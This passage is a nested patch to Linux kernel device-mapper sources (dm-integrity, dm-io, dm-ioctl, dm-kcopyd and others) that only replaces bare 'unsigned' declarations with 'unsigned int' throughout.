+-					unsigned digest_size = crypto_shash_digestsize(ic->internal_hash);
++					unsigned int digest_size = crypto_shash_digestsize(ic->internal_hash);
+ 					if (unlikely(digest_size > ic->tag_size)) {
+ 						char checksums_onstack[HASH_MAX_DIGESTSIZE];
+ 						integrity_sector_checksum(ic, logical_sector, (char *)js, checksums_onstack);
+@@ -2105,8 +2098,8 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ {
+ 	struct dm_integrity_c *ic = dio->ic;
+ 	struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+-	unsigned journal_section, journal_entry;
+-	unsigned journal_read_pos;
++	unsigned int journal_section, journal_entry;
++	unsigned int journal_read_pos;
+ 	struct completion read_comp;
+ 	bool discard_retried = false;
+ 	bool need_sync_io = ic->internal_hash && dio->op == REQ_OP_READ;
+@@ -2131,8 +2124,8 @@ retry:
+ 	journal_read_pos = NOT_FOUND;
+ 	if (ic->mode == 'J' && likely(dio->op != REQ_OP_DISCARD)) {
+ 		if (dio->op == REQ_OP_WRITE) {
+-			unsigned next_entry, i, pos;
+-			unsigned ws, we, range_sectors;
++			unsigned int next_entry, i, pos;
++			unsigned int ws, we, range_sectors;
+ 
+ 			dio->range.n_sectors = min(dio->range.n_sectors,
+ 						   (sector_t)ic->free_sectors << ic->sb->log2_sectors_per_block);
+@@ -2185,8 +2178,8 @@ retry:
+ 				if (unlikely(dio->range.n_sectors > next_sector - dio->range.logical_sector))
+ 					dio->range.n_sectors = next_sector - dio->range.logical_sector;
+ 			} else {
+-				unsigned i;
+-				unsigned jp = journal_read_pos + 1;
++				unsigned int i;
++				unsigned int jp = journal_read_pos + 1;
+ 				for (i = ic->sectors_per_block; i < dio->range.n_sectors; i += ic->sectors_per_block, jp++) {
+ 					if (!test_journal_node(ic, jp, dio->range.logical_sector + i))
+ 						break;
+@@ -2218,7 +2211,7 @@ offload_to_thread:
+ 		 */
+ 		if (journal_read_pos != NOT_FOUND) {
+ 			sector_t next_sector;
+-			unsigned new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
++			unsigned int new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
+ 			if (unlikely(new_pos != journal_read_pos)) {
+ 				remove_range_unlocked(ic, &dio->range);
+ 				goto retry;
+@@ -2227,7 +2220,7 @@ offload_to_thread:
+ 	}
+ 	if (ic->mode == 'J' && likely(dio->op == REQ_OP_DISCARD) && !discard_retried) {
+ 		sector_t next_sector;
+-		unsigned new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
++		unsigned int new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
+ 		if (unlikely(new_pos != NOT_FOUND) ||
+ 		    unlikely(next_sector < dio->range.logical_sector - dio->range.n_sectors)) {
+ 			remove_range_unlocked(ic, &dio->range);
+@@ -2354,8 +2347,8 @@ static void pad_uncommitted(struct dm_integrity_c *ic)
+ static void integrity_commit(struct work_struct *w)
+ {
+ 	struct dm_integrity_c *ic = container_of(w, struct dm_integrity_c, commit_work);
+-	unsigned commit_start, commit_sections;
+-	unsigned i, j, n;
++	unsigned int commit_start, commit_sections;
++	unsigned int i, j, n;
+ 	struct bio *flushes;
+ 
+ 	del_timer(&ic->autocommit_timer);
+@@ -2433,17 +2426,17 @@ static void complete_copy_from_journal(unsigned long error, void *context)
+ static void restore_last_bytes(struct dm_integrity_c *ic, struct journal_sector *js,
+ 			       struct journal_entry *je)
+ {
+-	unsigned s = 0;
++	unsigned int s = 0;
+ 	do {
+ 		js->commit_id = je->last_bytes[s];
+ 		js++;
+ 	} while (++s < ic->sectors_per_block);
+ }
+ 
+-static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+-			     unsigned write_sections, bool from_replay)
++static void do_journal_write(struct dm_integrity_c *ic, unsigned int write_start,
++			     unsigned int write_sections, bool from_replay)
+ {
+-	unsigned i, j, n;
++	unsigned int i, j, n;
+ 	struct journal_completion comp;
+ 	struct blk_plug plug;
+ 
+@@ -2462,9 +2455,9 @@ static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+ 		for (j = 0; j < ic->journal_section_entries; j++) {
+ 			struct journal_entry *je = access_journal_entry(ic, i, j);
+ 			sector_t sec, area, offset;
+-			unsigned k, l, next_loop;
++			unsigned int k, l, next_loop;
+ 			sector_t metadata_block;
+-			unsigned metadata_offset;
++			unsigned int metadata_offset;
+ 			struct journal_io *io;
+ 
+ 			if (journal_entry_is_unused(je))
+@@ -2472,7 +2465,7 @@ static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+ 			BUG_ON(unlikely(journal_entry_is_inprogress(je)) && !from_replay);
+ 			sec = journal_entry_get_sector(je);
+ 			if (unlikely(from_replay)) {
+-				if (unlikely(sec & (unsigned)(ic->sectors_per_block - 1))) {
++				if (unlikely(sec & (unsigned int)(ic->sectors_per_block - 1))) {
+ 					dm_integrity_io_error(ic, "invalid sector in journal", -EIO);
+ 					sec &= ~(sector_t)(ic->sectors_per_block - 1);
+ 				}
+@@ -2590,9 +2583,9 @@ skip_io:
+ static void integrity_writer(struct work_struct *w)
+ {
+ 	struct dm_integrity_c *ic = container_of(w, struct dm_integrity_c, writer_work);
+-	unsigned write_start, write_sections;
++	unsigned int write_start, write_sections;
+ 
+-	unsigned prev_free_sectors;
++	unsigned int prev_free_sectors;
+ 
+ 	spin_lock_irq(&ic->endio_wait.lock);
+ 	write_start = ic->committed_section;
+@@ -2639,12 +2632,12 @@ static void integrity_recalc(struct work_struct *w)
+ 	struct dm_io_region io_loc;
+ 	sector_t area, offset;
+ 	sector_t metadata_block;
+-	unsigned metadata_offset;
++	unsigned int metadata_offset;
+ 	sector_t logical_sector, n_sectors;
+ 	__u8 *t;
+-	unsigned i;
++	unsigned int i;
+ 	int r;
+-	unsigned super_counter = 0;
++	unsigned int super_counter = 0;
+ 
+ 	DEBUG_print("start recalculation... (position %llx)\n", le64_to_cpu(ic->sb->recalc_sector));
+ 
+@@ -2668,7 +2661,7 @@ next_chunk:
+ 	get_area_and_offset(ic, range.logical_sector, &area, &offset);
+ 	range.n_sectors = min((sector_t)RECALC_SECTORS, ic->provided_data_sectors - range.logical_sector);
+ 	if (!ic->meta_dev)
+-		range.n_sectors = min(range.n_sectors, ((sector_t)1U << ic->sb->log2_interleave_sectors) - (unsigned)offset);
++		range.n_sectors = min(range.n_sectors, ((sector_t)1U << ic->sb->log2_interleave_sectors) - (unsigned int)offset);
+ 
+ 	add_new_range_and_wait(ic, &range);
+ 	spin_unlock_irq(&ic->endio_wait.lock);
+@@ -2859,10 +2852,10 @@ static void bitmap_flush_work(struct work_struct *work)
+ }
+ 
+ 
+-static void init_journal(struct dm_integrity_c *ic, unsigned start_section,
+-			 unsigned n_sections, unsigned char commit_seq)
++static void init_journal(struct dm_integrity_c *ic, unsigned int start_section,
++			 unsigned int n_sections, unsigned char commit_seq)
+ {
+-	unsigned i, j, n;
++	unsigned int i, j, n;
+ 
+ 	if (!n_sections)
+ 		return;
+@@ -2885,7 +2878,7 @@ static void init_journal(struct dm_integrity_c *ic, unsigned start_section,
+ 	write_journal(ic, start_section, n_sections);
+ }
+ 
+-static int find_commit_seq(struct dm_integrity_c *ic, unsigned i, unsigned j, commit_id_t id)
++static int find_commit_seq(struct dm_integrity_c *ic, unsigned int i, unsigned int j, commit_id_t id)
+ {
+ 	unsigned char k;
+ 	for (k = 0; k < N_COMMIT_IDS; k++) {
+@@ -2898,11 +2891,11 @@ static int find_commit_seq(struct dm_integrity_c *ic, unsigned i, unsigned j, co
+ 
+ static void replay_journal(struct dm_integrity_c *ic)
+ {
+-	unsigned i, j;
++	unsigned int i, j;
+ 	bool used_commit_ids[N_COMMIT_IDS];
+-	unsigned max_commit_id_sections[N_COMMIT_IDS];
+-	unsigned write_start, write_sections;
+-	unsigned continue_section;
++	unsigned int max_commit_id_sections[N_COMMIT_IDS];
++	unsigned int write_start, write_sections;
++	unsigned int continue_section;
+ 	bool journal_empty;
+ 	unsigned char unused, last_used, want_commit_seq;
+ 
+@@ -3020,7 +3013,7 @@ brk:
+ 		ic->commit_seq = want_commit_seq;
+ 		DEBUG_print("continuing from section %u, commit seq %d\n", write_start, ic->commit_seq);
+ 	} else {
+-		unsigned s;
++		unsigned int s;
+ 		unsigned char erase_seq;
+ clear_journal:
+ 		DEBUG_print("clearing journal\n");
+@@ -3252,10 +3245,10 @@ static void dm_integrity_resume(struct dm_target *ti)
+ }
+ 
+ static void dm_integrity_status(struct dm_target *ti, status_type_t type,
+-				unsigned status_flags, char *result, unsigned maxlen)
++				unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_integrity_c *ic = (struct dm_integrity_c *)ti->private;
+-	unsigned arg_count;
++	unsigned int arg_count;
+ 	size_t sz = 0;
+ 
+ 	switch (type) {
+@@ -3305,7 +3298,7 @@ static void dm_integrity_status(struct dm_target *ti, status_type_t type,
+ 		DMEMIT(" interleave_sectors:%u", 1U << ic->sb->log2_interleave_sectors);
+ 		DMEMIT(" buffer_sectors:%u", 1U << ic->log2_buffer_sectors);
+ 		if (ic->mode == 'J') {
+-			DMEMIT(" journal_watermark:%u", (unsigned)watermark_percentage);
++			DMEMIT(" journal_watermark:%u", (unsigned int)watermark_percentage);
+ 			DMEMIT(" commit_time:%u", ic->autocommit_msec);
+ 		}
+ 		if (ic->mode == 'B') {
+@@ -3384,7 +3377,7 @@ static void dm_integrity_io_hints(struct dm_target *ti, struct queue_limits *lim
+ 
+ static void calculate_journal_section_size(struct dm_integrity_c *ic)
+ {
+-	unsigned sector_space = JOURNAL_SECTOR_DATA;
++	unsigned int sector_space = JOURNAL_SECTOR_DATA;
+ 
+ 	ic->journal_sections = le32_to_cpu(ic->sb->journal_sections);
+ 	ic->journal_entry_size = roundup(offsetof(struct journal_entry, last_bytes[ic->sectors_per_block]) + ic->tag_size,
+@@ -3461,9 +3454,10 @@ static void get_provided_data_sectors(struct dm_integrity_c *ic)
+ 	}
+ }
+ 
+-static int initialize_superblock(struct dm_integrity_c *ic, unsigned journal_sectors, unsigned interleave_sectors)
++static int initialize_superblock(struct dm_integrity_c *ic,
++				 unsigned int journal_sectors, unsigned int interleave_sectors)
+ {
+-	unsigned journal_sections;
++	unsigned int journal_sections;
+ 	int test_bit;
+ 
+ 	memset(ic->sb, 0, SB_SECTORS << SECTOR_SHIFT);
+@@ -3548,7 +3542,7 @@ static void dm_integrity_set(struct dm_target *ti, struct dm_integrity_c *ic)
+ 
+ static void dm_integrity_free_page_list(struct page_list *pl)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	if (!pl)
+ 		return;
+@@ -3557,10 +3551,10 @@ static void dm_integrity_free_page_list(struct page_list *pl)
+ 	kvfree(pl);
+ }
+ 
+-static struct page_list *dm_integrity_alloc_page_list(unsigned n_pages)
++static struct page_list *dm_integrity_alloc_page_list(unsigned int n_pages)
+ {
+ 	struct page_list *pl;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	pl = kvmalloc_array(n_pages + 1, sizeof(struct page_list), GFP_KERNEL | __GFP_ZERO);
+ 	if (!pl)
+@@ -3583,7 +3577,7 @@ static struct page_list *dm_integrity_alloc_page_list(unsigned n_pages)
+ 
+ static void dm_integrity_free_journal_scatterlist(struct dm_integrity_c *ic, struct scatterlist **sl)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < ic->journal_sections; i++)
+ 		kvfree(sl[i]);
+ 	kvfree(sl);
+@@ -3593,7 +3587,7 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 								   struct page_list *pl)
+ {
+ 	struct scatterlist **sl;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	sl = kvmalloc_array(ic->journal_sections,
+ 			    sizeof(struct scatterlist *),
+@@ -3603,10 +3597,10 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 
+ 	for (i = 0; i < ic->journal_sections; i++) {
+ 		struct scatterlist *s;
+-		unsigned start_index, start_offset;
+-		unsigned end_index, end_offset;
+-		unsigned n_pages;
+-		unsigned idx;
++		unsigned int start_index, start_offset;
++		unsigned int end_index, end_offset;
++		unsigned int n_pages;
++		unsigned int idx;
+ 
+ 		page_list_location(ic, i, 0, &start_index, &start_offset);
+ 		page_list_location(ic, i, ic->journal_section_sectors - 1,
+@@ -3624,7 +3618,7 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 		sg_init_table(s, n_pages);
+ 		for (idx = start_index; idx <= end_index; idx++) {
+ 			char *va = lowmem_page_address(pl[idx].page);
+-			unsigned start = 0, end = PAGE_SIZE;
++			unsigned int start = 0, end = PAGE_SIZE;
+ 			if (idx == start_index)
+ 				start = start_offset;
+ 			if (idx == end_index)
+@@ -3711,7 +3705,7 @@ static int get_mac(struct crypto_shash **hash, struct alg_spec *a, char **error,
+ static int create_journal(struct dm_integrity_c *ic, char **error)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	__u64 journal_pages, journal_desc_size, journal_tree_size;
+ 	unsigned char *crypt_data = NULL, *crypt_iv = NULL;
+ 	struct skcipher_request *req = NULL;
+@@ -3738,7 +3732,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 		goto bad;
+ 	}
+ 	if (ic->journal_crypt_alg.alg_string) {
+-		unsigned ivsize, blocksize;
++		unsigned int ivsize, blocksize;
+ 		struct journal_completion comp;
+ 
+ 		comp.ic = ic;
+@@ -3827,7 +3821,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 			crypto_free_skcipher(ic->journal_crypt);
+ 			ic->journal_crypt = NULL;
+ 		} else {
+-			unsigned crypt_len = roundup(ivsize, blocksize);
++			unsigned int crypt_len = roundup(ivsize, blocksize);
+ 
+ 			req = skcipher_request_alloc(ic->journal_crypt, GFP_KERNEL);
+ 			if (!req) {
+@@ -3915,7 +3909,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 	}
+ 
+ 	for (i = 0; i < N_COMMIT_IDS; i++) {
+-		unsigned j;
++		unsigned int j;
+ retest_commit_id:
+ 		for (j = 0; j < i; j++) {
+ 			if (ic->commit_ids[j] == ic->commit_ids[i]) {
+@@ -3969,17 +3963,17 @@ bad:
+  *		journal_mac
+  *		recalculate
+  */
+-static int dm_integrity_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_integrity_c *ic;
+ 	char dummy;
+ 	int r;
+-	unsigned extra_args;
++	unsigned int extra_args;
+ 	struct dm_arg_set as;
+ 	static const struct dm_arg _args[] = {
+ 		{0, 18, "Invalid number of feature args"},
+ 	};
+-	unsigned journal_sectors, interleave_sectors, buffer_sectors, journal_watermark, sync_msec;
++	unsigned int journal_sectors, interleave_sectors, buffer_sectors, journal_watermark, sync_msec;
+ 	bool should_write_sb;
+ 	__u64 threshold;
+ 	unsigned long long start;
+@@ -4058,7 +4052,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 
+ 	while (extra_args--) {
+ 		const char *opt_string;
+-		unsigned val;
++		unsigned int val;
+ 		unsigned long long llval;
+ 		opt_string = dm_shift_arg(&as);
+ 		if (!opt_string) {
+@@ -4391,7 +4385,7 @@ try_smaller_buffer:
+ 	DEBUG_print("	journal_entries_per_sector %u\n", ic->journal_entries_per_sector);
+ 	DEBUG_print("	journal_section_entries %u\n", ic->journal_section_entries);
+ 	DEBUG_print("	journal_section_sectors %u\n", ic->journal_section_sectors);
+-	DEBUG_print("	journal_sections %u\n", (unsigned)le32_to_cpu(ic->sb->journal_sections));
++	DEBUG_print("	journal_sections %u\n", (unsigned int)le32_to_cpu(ic->sb->journal_sections));
+ 	DEBUG_print("	journal_entries %u\n", ic->journal_entries);
+ 	DEBUG_print("	log2_interleave_sectors %d\n", ic->sb->log2_interleave_sectors);
+ 	DEBUG_print("	data_device_sectors 0x%llx\n", bdev_nr_sectors(ic->dev->bdev));
+@@ -4465,8 +4459,8 @@ try_smaller_buffer:
+ 	}
+ 
+ 	if (ic->mode == 'B') {
+-		unsigned i;
+-		unsigned n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
++		unsigned int i;
++		unsigned int n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
+ 
+ 		ic->recalc_bitmap = dm_integrity_alloc_page_list(n_bitmap_pages);
+ 		if (!ic->recalc_bitmap) {
+@@ -4486,7 +4480,7 @@ try_smaller_buffer:
+ 		INIT_DELAYED_WORK(&ic->bitmap_flush_work, bitmap_flush_work);
+ 		for (i = 0; i < ic->n_bitmap_blocks; i++) {
+ 			struct bitmap_block_status *bbs = &ic->bbs[i];
+-			unsigned sector, pl_index, pl_offset;
++			unsigned int sector, pl_index, pl_offset;
+ 
+ 			INIT_WORK(&bbs->work, bitmap_block_work);
+ 			bbs->ic = ic;
+@@ -4523,7 +4517,7 @@ try_smaller_buffer:
+ 			goto bad;
+ 	}
+ 	if (ic->mode == 'B') {
+-		unsigned max_io_len = ((sector_t)ic->sectors_per_block << ic->log2_blocks_per_bitmap_bit) * (BITMAP_BLOCK_SIZE * 8);
++		unsigned int max_io_len = ((sector_t)ic->sectors_per_block << ic->log2_blocks_per_bitmap_bit) * (BITMAP_BLOCK_SIZE * 8);
+ 		if (!max_io_len)
+ 			max_io_len = 1U << 31;
+ 		DEBUG_print("max_io_len: old %u, new %u\n", ti->max_io_len, max_io_len);
+@@ -4594,7 +4588,7 @@ static void dm_integrity_dtr(struct dm_target *ti)
+ 	if (ic->journal_io_scatterlist)
+ 		dm_integrity_free_journal_scatterlist(ic, ic->journal_io_scatterlist);
+ 	if (ic->sk_requests) {
+-		unsigned i;
++		unsigned int i;
+ 
+ 		for (i = 0; i < ic->journal_sections; i++) {
+ 			struct skcipher_request *req = ic->sk_requests[i];
+diff --git a/drivers/md/dm-io-rewind.c b/drivers/md/dm-io-rewind.c
+index 0db53ccb94ba7..773c4cff8b89f 100644
+--- a/drivers/md/dm-io-rewind.c
++++ b/drivers/md/dm-io-rewind.c
+@@ -57,7 +57,7 @@ static void dm_bio_integrity_rewind(struct bio *bio, unsigned int bytes_done)
+ {
+ 	struct bio_integrity_payload *bip = bio_integrity(bio);
+ 	struct blk_integrity *bi = blk_get_integrity(bio->bi_bdev->bd_disk);
+-	unsigned bytes = bio_integrity_bytes(bi, bytes_done >> 9);
++	unsigned int bytes = bio_integrity_bytes(bi, bytes_done >> 9);
+ 
+ 	bip->bip_iter.bi_sector -= bio_integrity_intervals(bi, bytes_done >> 9);
+ 	dm_bvec_iter_rewind(bip->bip_vec, &bip->bip_iter, bytes);
+@@ -131,7 +131,7 @@ static inline void dm_bio_rewind_iter(const struct bio *bio,
+  * rewinding from end of bio and restoring its original position.
+  * Caller is also responsibile for restoring bio's size.
+  */
+-static void dm_bio_rewind(struct bio *bio, unsigned bytes)
++static void dm_bio_rewind(struct bio *bio, unsigned int bytes)
+ {
+ 	if (bio_integrity(bio))
+ 		dm_bio_integrity_rewind(bio, bytes);
+diff --git a/drivers/md/dm-io.c b/drivers/md/dm-io.c
+index 7835645334593..e488b05e35fa3 100644
+--- a/drivers/md/dm-io.c
++++ b/drivers/md/dm-io.c
+@@ -48,7 +48,7 @@ static struct kmem_cache *_dm_io_cache;
+ struct dm_io_client *dm_io_client_create(void)
+ {
+ 	struct dm_io_client *client;
+-	unsigned min_ios = dm_get_reserved_bio_based_ios();
++	unsigned int min_ios = dm_get_reserved_bio_based_ios();
+ 	int ret;
+ 
+ 	client = kzalloc(sizeof(*client), GFP_KERNEL);
+@@ -88,7 +88,7 @@ EXPORT_SYMBOL(dm_io_client_destroy);
+  * bi_private.
+  *---------------------------------------------------------------*/
+ static void store_io_and_region_in_bio(struct bio *bio, struct io *io,
+-				       unsigned region)
++				       unsigned int region)
+ {
+ 	if (unlikely(!IS_ALIGNED((unsigned long)io, DM_IO_MAX_REGIONS))) {
+ 		DMCRIT("Unaligned struct io pointer %p", io);
+@@ -99,7 +99,7 @@ static void store_io_and_region_in_bio(struct bio *bio, struct io *io,
+ }
+ 
+ static void retrieve_io_and_region_from_bio(struct bio *bio, struct io **io,
+-				       unsigned *region)
++				       unsigned int *region)
+ {
+ 	unsigned long val = (unsigned long)bio->bi_private;
+ 
+@@ -137,7 +137,7 @@ static void dec_count(struct io *io, unsigned int region, blk_status_t error)
+ static void endio(struct bio *bio)
+ {
+ 	struct io *io;
+-	unsigned region;
++	unsigned int region;
+ 	blk_status_t error;
+ 
+ 	if (bio->bi_status && bio_data_dir(bio) == READ)
+@@ -160,11 +160,11 @@ static void endio(struct bio *bio)
+  *---------------------------------------------------------------*/
+ struct dpages {
+ 	void (*get_page)(struct dpages *dp,
+-			 struct page **p, unsigned long *len, unsigned *offset);
++			 struct page **p, unsigned long *len, unsigned int *offset);
+ 	void (*next_page)(struct dpages *dp);
+ 
+ 	union {
+-		unsigned context_u;
++		unsigned int context_u;
+ 		struct bvec_iter context_bi;
+ 	};
+ 	void *context_ptr;
+@@ -177,9 +177,9 @@ struct dpages {
+  * Functions for getting the pages from a list.
+  */
+ static void list_get_page(struct dpages *dp,
+-		  struct page **p, unsigned long *len, unsigned *offset)
++		  struct page **p, unsigned long *len, unsigned int *offset)
+ {
+-	unsigned o = dp->context_u;
++	unsigned int o = dp->context_u;
+ 	struct page_list *pl = (struct page_list *) dp->context_ptr;
+ 
+ 	*p = pl->page;
+@@ -194,7 +194,7 @@ static void list_next_page(struct dpages *dp)
+ 	dp->context_u = 0;
+ }
+ 
+-static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned offset)
++static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned int offset)
+ {
+ 	dp->get_page = list_get_page;
+ 	dp->next_page = list_next_page;
+@@ -206,7 +206,7 @@ static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned offse
+  * Functions for getting the pages from a bvec.
+  */
+ static void bio_get_page(struct dpages *dp, struct page **p,
+-			 unsigned long *len, unsigned *offset)
++			 unsigned long *len, unsigned int *offset)
+ {
+ 	struct bio_vec bvec = bvec_iter_bvec((struct bio_vec *)dp->context_ptr,
+ 					     dp->context_bi);
+@@ -244,7 +244,7 @@ static void bio_dp_init(struct dpages *dp, struct bio *bio)
+  * Functions for getting the pages from a VMA.
+  */
+ static void vm_get_page(struct dpages *dp,
+-		 struct page **p, unsigned long *len, unsigned *offset)
++		 struct page **p, unsigned long *len, unsigned int *offset)
+ {
+ 	*p = vmalloc_to_page(dp->context_ptr);
+ 	*offset = dp->context_u;
+@@ -269,7 +269,7 @@ static void vm_dp_init(struct dpages *dp, void *data)
+  * Functions for getting the pages from kernel memory.
+  */
+ static void km_get_page(struct dpages *dp, struct page **p, unsigned long *len,
+-			unsigned *offset)
++			unsigned int *offset)
+ {
+ 	*p = virt_to_page(dp->context_ptr);
+ 	*offset = dp->context_u;
+@@ -293,15 +293,15 @@ static void km_dp_init(struct dpages *dp, void *data)
+ /*-----------------------------------------------------------------
+  * IO routines that accept a list of pages.
+  *---------------------------------------------------------------*/
+-static void do_region(const blk_opf_t opf, unsigned region,
++static void do_region(const blk_opf_t opf, unsigned int region,
+ 		      struct dm_io_region *where, struct dpages *dp,
+ 		      struct io *io)
+ {
+ 	struct bio *bio;
+ 	struct page *page;
+ 	unsigned long len;
+-	unsigned offset;
+-	unsigned num_bvecs;
++	unsigned int offset;
++	unsigned int num_bvecs;
+ 	sector_t remaining = where->count;
+ 	struct request_queue *q = bdev_get_queue(where->bdev);
+ 	sector_t num_sectors;
+@@ -508,7 +508,7 @@ static int dp_init(struct dm_io_request *io_req, struct dpages *dp,
+ 	return 0;
+ }
+ 
+-int dm_io(struct dm_io_request *io_req, unsigned num_regions,
++int dm_io(struct dm_io_request *io_req, unsigned int num_regions,
+ 	  struct dm_io_region *where, unsigned long *sync_error_bits)
+ {
+ 	int r;
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index e031088ff15c6..37f5ea7337cc2 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -31,7 +31,7 @@ struct dm_file {
+ 	 * poll will wait until the global event number is greater than
+ 	 * this value.
+ 	 */
+-	volatile unsigned global_event_nr;
++	volatile unsigned int global_event_nr;
+ };
+ 
+ /*-----------------------------------------------------------------
+@@ -413,7 +413,7 @@ static struct mapped_device *dm_hash_rename(struct dm_ioctl *param,
+ 	struct hash_cell *hc;
+ 	struct dm_table *table;
+ 	struct mapped_device *md;
+-	unsigned change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
++	unsigned int change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
+ 	int srcu_idx;
+ 
+ 	/*
+@@ -1021,7 +1021,7 @@ static int dev_rename(struct file *filp, struct dm_ioctl *param, size_t param_si
+ 	int r;
+ 	char *new_data = (char *) param + param->data_start;
+ 	struct mapped_device *md;
+-	unsigned change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
++	unsigned int change_uuid = (param->flags & DM_UUID_FLAG) ? 1 : 0;
+ 
+ 	if (new_data < param->data ||
+ 	    invalid_str(new_data, (void *) param + param_size) || !*new_data ||
+@@ -1096,7 +1096,7 @@ out:
+ static int do_suspend(struct dm_ioctl *param)
+ {
+ 	int r = 0;
+-	unsigned suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
++	unsigned int suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
+ 	struct mapped_device *md;
+ 
+ 	md = find_device(param);
+@@ -1125,7 +1125,7 @@ out:
+ static int do_resume(struct dm_ioctl *param)
+ {
+ 	int r = 0;
+-	unsigned suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
++	unsigned int suspend_flags = DM_SUSPEND_LOCKFS_FLAG;
+ 	struct hash_cell *hc;
+ 	struct mapped_device *md;
+ 	struct dm_table *new_map, *old_map = NULL;
+@@ -1243,7 +1243,7 @@ static void retrieve_status(struct dm_table *table,
+ 	char *outbuf, *outptr;
+ 	status_type_t type;
+ 	size_t remaining, len, used = 0;
+-	unsigned status_flags = 0;
++	unsigned int status_flags = 0;
+ 
+ 	outptr = outbuf = get_result_buffer(param, param_size, &len);
+ 
+@@ -1648,8 +1648,8 @@ static int table_status(struct file *filp, struct dm_ioctl *param, size_t param_
+  * Returns a number <= 1 if message was processed by device mapper.
+  * Returns 2 if message should be delivered to the target.
+  */
+-static int message_for_md(struct mapped_device *md, unsigned argc, char **argv,
+-			  char *result, unsigned maxlen)
++static int message_for_md(struct mapped_device *md, unsigned int argc, char **argv,
++			  char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 
+@@ -1859,7 +1859,7 @@ static int copy_params(struct dm_ioctl __user *user, struct dm_ioctl *param_kern
+ 	struct dm_ioctl *dmi;
+ 	int secure_data;
+ 	const size_t minimum_data_size = offsetof(struct dm_ioctl, data);
+-	unsigned noio_flag;
++	unsigned int noio_flag;
+ 
+ 	if (copy_from_user(param_kernel, user, minimum_data_size))
+ 		return -EFAULT;
+diff --git a/drivers/md/dm-kcopyd.c b/drivers/md/dm-kcopyd.c
+index 4d3bbbea2e9a8..0ef78e56aa88c 100644
+--- a/drivers/md/dm-kcopyd.c
++++ b/drivers/md/dm-kcopyd.c
+@@ -34,14 +34,14 @@
+ #define DEFAULT_SUB_JOB_SIZE_KB 512
+ #define MAX_SUB_JOB_SIZE_KB     1024
+ 
+-static unsigned kcopyd_subjob_size_kb = DEFAULT_SUB_JOB_SIZE_KB;
++static unsigned int kcopyd_subjob_size_kb = DEFAULT_SUB_JOB_SIZE_KB;
+ 
+ module_param(kcopyd_subjob_size_kb, uint, S_IRUGO | S_IWUSR);
+ MODULE_PARM_DESC(kcopyd_subjob_size_kb, "Sub-job size for dm-kcopyd clients");
+ 
+-static unsigned dm_get_kcopyd_subjob_size(void)
++static unsigned int dm_get_kcopyd_subjob_size(void)
+ {
+-	unsigned sub_job_size_kb;
++	unsigned int sub_job_size_kb;
+ 
+ 	sub_job_size_kb = __dm_get_module_param(&kcopyd_subjob_size_kb,
+ 						DEFAULT_SUB_JOB_SIZE_KB,
+@@ -56,9 +56,9 @@ static unsigned dm_get_kcopyd_subjob_size(void)
+  *---------------------------------------------------------------*/
+ struct dm_kcopyd_client {
+ 	struct page_list *pages;
+-	unsigned nr_reserved_pages;
+-	unsigned nr_free_pages;
+-	unsigned sub_job_size;
++	unsigned int nr_reserved_pages;
++	unsigned int nr_free_pages;
++	unsigned int sub_job_size;
+ 
+ 	struct dm_io_client *io_client;
+ 
+@@ -119,7 +119,7 @@ static DEFINE_SPINLOCK(throttle_spinlock);
+ 
+ static void io_job_start(struct dm_kcopyd_throttle *t)
+ {
+-	unsigned throttle, now, difference;
++	unsigned int throttle, now, difference;
+ 	int slept = 0, skew;
+ 
+ 	if (unlikely(!t))
+@@ -182,7 +182,7 @@ static void io_job_finish(struct dm_kcopyd_throttle *t)
+ 		goto skip_limit;
+ 
+ 	if (!t->num_io_jobs) {
+-		unsigned now, difference;
++		unsigned int now, difference;
+ 
+ 		now = jiffies;
+ 		difference = now - t->last_jiffies;
+@@ -303,9 +303,9 @@ static void drop_pages(struct page_list *pl)
+ /*
+  * Allocate and reserve nr_pages for the use of a specific client.
+  */
+-static int client_reserve_pages(struct dm_kcopyd_client *kc, unsigned nr_pages)
++static int client_reserve_pages(struct dm_kcopyd_client *kc, unsigned int nr_pages)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	struct page_list *pl = NULL, *next;
+ 
